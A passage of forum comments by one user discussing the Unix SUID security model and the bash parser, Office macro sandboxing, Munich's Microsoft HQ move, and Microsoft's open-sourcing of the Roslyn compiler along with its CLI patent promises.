2: Inadequate and too restrictive Unix security model. This led to the invention of SUID/setuid (a hole in the security boundary) because there were still a lot of tasks that "plain users" (or least privilege daemons) legitimately needed to perform - such as printing, listen on sockets etc. Rather than refining the security model, SUID punched a deliberate hole in it. However, this means that user accounts are frequently not granted rights to access a *resource* or a syscall - rather they are granted right to launch an *executable* (SUID) that will execute with an effective user (often root, sadly) who has access to the resource. Which means that you have created a culture where you all but *need* to launch processes through system() calls to get the job done. With a proper security model where such right could be *delegated* you would not have to invoke external executables.

3: Old software that lingers on even in modern operating systems. It has long been accepted that the bash parser is, well, quirky. The way that it is semi-line oriented, for instance (definitions only take effect on a line-by-line basis). Today, parser construction is under-graduate stuff, all the principles are well known. The bash code in question was written in another era and by another community where those principles were perhaps not as well known as they are today.

Munich considers dumping Linux for ... GULP ... Windows!

Uffe Seerup

Re: 1800 jobs

Except:

1) The Microsoft HQ is already there. They'll move 15 kilometers to the south in 2016

2) The decision has already been made, planning completed and they are about to start building - if they have not already

3) The decision was takes almost a year ago during the previous administration. The currect Stadtrat was elected this March!

It could still be a case of a few mayors having a pet project and wanting to make an impression. But trying to connect the HQ move to this decision is disingenuous.

Panic like it's 1999: Microsoft Office macro viruses are BACK

Uffe Seerup

Re: js and pdf proprietary extension, @big_D

[i]>>It's the same as in MS Office[/i]

It's similar. But MS Office (since Office 2010) also *sandboxes* documents that have been received from the Internet zone. This applies to files received through email or downloaded through a browser (all browsers support this).

Such files contain a marker in an alternate data stream that specifies that the file came from the "Internet zone".

When Office opens such a file it will open in a sandboxed process. The entire process runs in "low integrity mode" - and thus whatever it's macros may try to do - even if enabled - they will be restricted to the permissions of the low integrity process.

Microsoft C# chief Hejlsberg: Our open-source Apache pick will clear the FUD

Uffe Seerup

Not Apache httpd (the "server"), but the Apache *license*

Microsoft open sourced their C# and VB compiler under the Apache License 2.0 (http://www.apache.org/licenses/LICENSE-2.0), which includes grant of patent license:

"Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted"

Uffe Seerup

Re: I hope Apple do similar

The Common Language Infrastructure (CLI) has been placed as a standard under ISO. It is open for anyone to implement (as the Mono project did). There is no situation comparable to Java where you had to implement the full stack and pass a (closed source) compliance test.

A prerequisite for ISO adopting the standard was that Microsoft granted any patents essential for the implementation on RAND terms. Microsoft actually granted free right-to-use for any patents necessary for implement CLI. And they placed it under the community promise.

This is the C# (and VB) *compiler*. Mono already had their own compiler (and did a good job at that - sometimes beating Microsoft to market on new language features) - but not like this one with incremental compilation and every stage of compilation open for interception and/or inspection by the host process.

For years we've heard "It's a trap. Microsoft will sue and force Mono underground". Well, they cannot sue anyone for implementing the ISO standard*. Now they cannot sue anyone for using their own open sourced compiler. There are still a few libraries in the .NET stack which have not been open sourced or put under an ISO standard - but they get fewer and fewer and all the important ones (ASP.NET, MVC, all of the core libraries etc) are now open.

*"Well they can just sue anyway and use their army of lawyers to force you out of business" someone will still claim. Well, no. The community promise has legal estoppel. Should Microsoft sue, a lawyer can point to the promise (a "one-sided contract") and stand a very good chance of having the case dismissed outright.

Uffe Seerup

Re: Thought I was losing my mind..

That sound like a reusable parser, which is not novel or unusual.

Never claimed it was novel. However, reusable parser hardly does Roslyn justification. First of all, it is not just the "parser" - the lexer, scanner, parser, type analysis, inference engine, code-generation etc are all open for hooking by a hosting process.

Furthermore the "compiler" supports incremental compilation where the host process can subscribe to events about incremental changes for each step of the compilation process (lexer, parser, type analysis, codegen, etc). This allows virtual "no compile" scenarios where the output appears to always be in sync with the source - because only the parts actually affected by each code change will be recompiled. The typical compiler - even with reusable parsers - have much more coarse grained dependency graphs than what is available in Roslyn.

Most IDEs nowadays use this approach for syntax highlighting and associated warnings.

Indeed - but to support those features, the IDEs often implement more than half of their own compiler (excluding the codegen) because they need more sophisticated error recovery, more information about types/type analysis and (much) more sophisticated pattern recognition to identify possible code smells or refactoring candidates, than what is typically offered by the reusable parser.

In Roslyn you can hook into the compiler/parser and directly use the "compiler" to perform even global refactorings - simply by manipulating the compiler structures.

That's not the same as releasing the blueprints of a sophisticated virtual machine implementation, it's just documenting the bytecode.

Releasing the specification ensures that the *specification* is known. Having it placed under ISO means that Microsoft cannot just change it at a whim. It goes to trust. Remember the debacle about how Office documents were defined by what MS Office did? How many other execution systems have been standardized in a similar way. The Java VM spec is still owned by Oracle and not owned by any vendor-independent standards organization.

Incidentally, while the JIT probably has some optimization tricks up it's sleeve, most of the important optimizations will happen at the semantic level within the compiler that is now open source. This will benefit Mono a lot. Once they switch to Roslyn it should be interesting to see what happens over at the computer language shootout.

Uffe Seerup

CLI is an open specification

Microsoft's *implementation* is not open source (yet), but the specification is an open ISO specification.

http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-335.pdf

Microsoft grants patent license for any Microsoft patent necessary to implement the spec.

Mono has implemented a CLI according to the specification.

The specification has also been placed under the Community Promise

http://www.microsoft.com/openspecifications/en/us/programs/community-promise/covered-specifications/default.aspx

Uffe Seerup
Boffin

Re: Thought I was losing my mind..

The Roslyn "compiler" is so much more than a mere producer of bytecode. The big thing of Roslyn is how it opens up its internal services and allows tool makers (IDE authors, refactoring authors, reporting/analytics, metaprogramming, code generators, etc etc) to use the parts of the compiler that applies to their problem.

For instance, Microsoft has demonstrated how Roslyn in a few lines of code can be used to implement style warnings and automate style fixes (such as missing curly braces) in a way that *any* IDE or tool based on Roslyn can pick up and use right away.

BTW - the "core" .NET infrastructure (the CLR and the core libraries) are already open specifications which anyone can implement the way Mono did. The specifications has been adopted as ISO standards and comes with patent grants (you are automatically granted license to any Microsoft patent necessary to implement the CLR and core libraries). Furthermore, the CLR and core libraries specification has been placed under the Community Promise to address concerns that Microsoft could just sue anyway and win not by being right but by having more lawyers.

The Community Promise has (at least in the US) legal estoppel - meaning that it will be trivial to have a case where Microsoft asserts its patents against an implementation throw out of court outright - even with possible retribution against the officers of the court who brought such a frivolous case. Meaning that Microsoft would have a hard time finding such lawyers.

Page: